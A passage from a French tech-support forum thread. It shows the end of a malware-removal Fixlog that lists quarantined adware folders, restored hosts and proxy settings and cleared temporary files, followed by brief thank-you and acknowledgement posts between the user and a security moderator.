C:\Users\Public\Desktop\FurtherMarket.lnk => moved successfully
C:\Users\FRED\AppData\Local\FurtherMarket => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket => moved successfully
C:\Program Files (x86)\FurtherMarket => moved successfully
C:\Users\FRED\AppData\Local\glory => moved successfully
C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B} => moved successfully
C:\Stuvatybugtain => moved successfully
C:\Users\FRED\AppData\Local\terana => moved successfully
C:\Program Files (x86)\MIO => moved successfully
C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA} => moved successfully
C:\Pipisy => moved successfully
C:\Program Files\MK => moved successfully
C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7} => moved successfully
C:\Cosusp => moved successfully
C:\Program Files (x86)\Biwerghtplawock => moved successfully
C:\Windows\System32\Tasks\Pracly Debuger => moved successfully
C:\Users\FRED\AppData\Roaming\Morulekazer => moved successfully
C:\Users\FRED\AppData\Local\Kerlersh => moved successfully
C:\Program Files (x86)\Pracly Debuger => moved successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
========= RemoveProxy: =========
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
========= End of RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8595825 B
Java, Flash, Steam htmlcache => 708 B
Windows/system/drivers => 121910297 B
Edge => 0 B
Chrome => 147456 B
Firefox => 2113062 B
Opera => 214016 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile32 => 0 B
LocalService => 26336 B
NetworkService => 0 B
FRED => 17648222 B
RecycleBin => 0 B
EmptyTemp: => 151.7 MB temporary data Removed.
================================
The system needed a reboot.
End of Fixlog 17:04:35
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
46
14 juin 2017 à 07:27
14 juin 2017 à 07:27
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
46
14 juin 2017 à 10:03
14 juin 2017 à 10:03
Merci jusqu'ici tout vas bien je suis en observation jusqu'à ce soir... je vérifie que tout vas bien...
grand merci après je passerai le sujet a résolu
grand merci après je passerai le sujet a résolu
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
14 juin 2017 à 18:08
14 juin 2017 à 18:08
ça roule :)
